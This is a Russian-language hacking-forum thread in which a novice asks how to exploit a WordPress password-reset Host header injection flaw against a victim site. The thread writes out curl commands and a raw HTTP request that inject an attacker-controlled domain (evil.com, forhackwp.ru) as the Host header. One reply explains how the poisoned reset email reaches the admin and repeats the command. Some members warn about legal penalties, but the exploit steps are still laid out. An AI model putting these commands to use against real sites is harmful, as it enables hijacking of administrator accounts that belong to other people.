Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Подскажите как воспользоваться уязвимостью Wordpress (https://forum.antichat.xyz/showthread.php?t=457431)

itprepod 02.11.2017 22:28

Всем привет.

Подскажите как воспользоваться уязвимостью Wordpress, описанной здесь:

https://wpvulndb.com/vulnerabilities/8807

я так понимаю, что это:

curl -H "Host: www.evil.com" --data "user_login=admin&redirect_to=&wp-submit=Get+New+Password" http://example.com/wp-login.php?action=lostpassword

Команда для терминала в линукс?

Что должно быть вместо evil.com ?

вместо example.com сайт жертвы?

или наоборот?

Разъясните пожалуйста.

Dr_Wile 02.11.2017 23:17

Всё верно. Команда вводится в терминал Linux, example.com - сайт жертвы. А вот что это за хост evil.com....

В хелпе curl сказано:

-H, --header LINE Передача пользовательского заголовка LINE на сервер (H)

M_script 03.11.2017 07:01

Цитата:

Сообщение от itprepod
itprepod said:

Команда для терминала в линукс?

cURL кроссплатформенный

Вы вообще понимаете, что эта уязвимость дает и какой код должен быть на вашем сайте (evil.com) для проведения атаки?

itprepod 03.11.2017 10:06

Цитата:

Сообщение от M_script
M_script said:

cURL кроссплатформенный
Вы вообще понимаете, что эта уязвимость дает и какой код должен быть на вашем сайте (evil.com) для проведения атаки?

Я так понимаю, что с помощью этой уязвимости, можно получить письмо для генерации нового пароля от аккаунта сайта (не важно он с правами админа или нет) на свою почту.

Не знаю какой код должен быть на сайте вместо evil.com, поэтому я здесь.

M_script 04.11.2017 03:00

Цитата:

Сообщение от itprepod
itprepod said:

Я так понимаю, что с помощью этой уязвимости, можно получить письмо для генерации нового пароля от аккаунта сайта (не важно он с правами админа или нет) на свою почту.

С первой попытки не угадали. Попробуйте еще раз.

Цитата:

Сообщение от itprepod
itprepod said:

Не знаю какой код должен быть на сайте вместо evil.com, поэтому я здесь.

То есть, ничего не знаете, но что-то хотите взломать? А знаете, какой срок дают за то, что вы собираетесь сделать?

brown 04.11.2017 07:19

работа по ру запрещена)

GroM88 04.11.2017 09:47

Цитата:

Сообщение от brown
brown said:

работа по ру запрещена)

Это было указанно в описании к уязвимости?))

itprepod 04.11.2017 18:57

Цитата:

Сообщение от M_script
M_script said:

С первой попытки не угадали. Попробуйте еще раз.
То есть, ничего не знаете, но что-то хотите взломать? А знаете, какой срок дают за то, что вы собираетесь сделать?

Я в целях помочь админу в закрытии уязвимости, а не в целях навредить.

itprepod 06.11.2017 02:19

Цитата:

Сообщение от M_script
M_script said:

С первой попытки не угадали. Попробуйте еще раз.

Или с помощью этой уязвимости можно подменить email админа при заказе письма по восстановлению пароля?

Вот здесь:

https://exploitbox.io/vuln/WordPress...2017-8295.html

Показано, что письмо по восстановлению пароля приходит от wordpress@attackers-mxserver.com

Вместо attackers-mxserver.com может быть любой другой домен.

Но перед атакой получается мне нужно создать почту на домене.

Порядок действий:

1. Регаю домен. Пусть будет forhackwp.ru

2. Делаю почту wordpress@forhackwp.ru

3. Запускаю Линукс. Пишу в терминал:

curl -H "Host: forhackwp.ru" --data "user_login=admin&redirect_to=&wp-submit=Get+New+Password" http://тут-домен-жертвы/wp-login.php?action=lostpassword

4. Жду письма на свою почту: wordpress@forhackwp.ru ?

Или нет?

Вот тут:

https://exploitbox.io/vuln/WordPress...2017-8295.html

Написано (перевод):

Если злоумышленник отправляет запрос, аналогичный приведенному ниже WordPress по умолчанию

установка, доступная IP-адрес (IP-основе виртуального хоста):

-----[ HTTP Request ]----

POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1

Host: injected-attackers-mxserver.com

Content-Type: application/x-www-form-urlencoded

Content-Length: 56

user_login=admin&redirect_to=&wp-submit=Get+New+Password

------------------------

WordPress будет вызвать функцию сброса пароля для учетной записи пользователя с правами администратора.

Из-за измененного заголовка узла имя_сервера будет присвоено значение

имя хоста по выбору злоумышленника.

В результате WordPress передаст следующие заголовки и текст сообщения электронной почты

/usr/bin / обертка sendmail:

------[ полученная электронная почта ]-----

Subject: [CompanyX WP] Password Reset

Return-Path:

From: WordPress

Message-ID:

X-Priority: 3

MIME-Version: 1.0

Content-Type: text/plain; charset=UTF-8

Content-Transfer-Encoding: 8bit

Someone requested that the password be reset for the following account:

http://companyX-wp/wp/wordpress/

Username: admin

If this was a mistake, just ignore this email and nothing will happen.

To reset your password, visit the following address:

"]http://companyX-wp/wp/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login =admin>[/URL]

-------------------------------

Как сделать HTTP запрос?

crlf 06.11.2017 02:48

Цитата:

Сообщение от itprepod
itprepod said:

Я в целях помочь админу в закрытии уязвимости, а не в целях навредить.

Совета по обновилению WP до последней версии, будет достаточно.

Цитата:

Сообщение от itprepod
itprepod said:

Или нет?

Нет. Письмо улетит админу, но в линках и заголовках будет домен атакующего.

Так же, должны быть соблюдены условия для успешной эксплуатации.

Цитата:

Сообщение от itprepod
itprepod said:

Как сделать HTTP запрос?

Цитата:

Сообщение от itprepod
itprepod said:

curl -H "Host: forhackwp.ru" --data "user_login=admin&redirect_to=&wp-submit=Get+New+Password"
http://тут-домен-жертвы/wp-login.php?action=lostpassword



Время: 17:11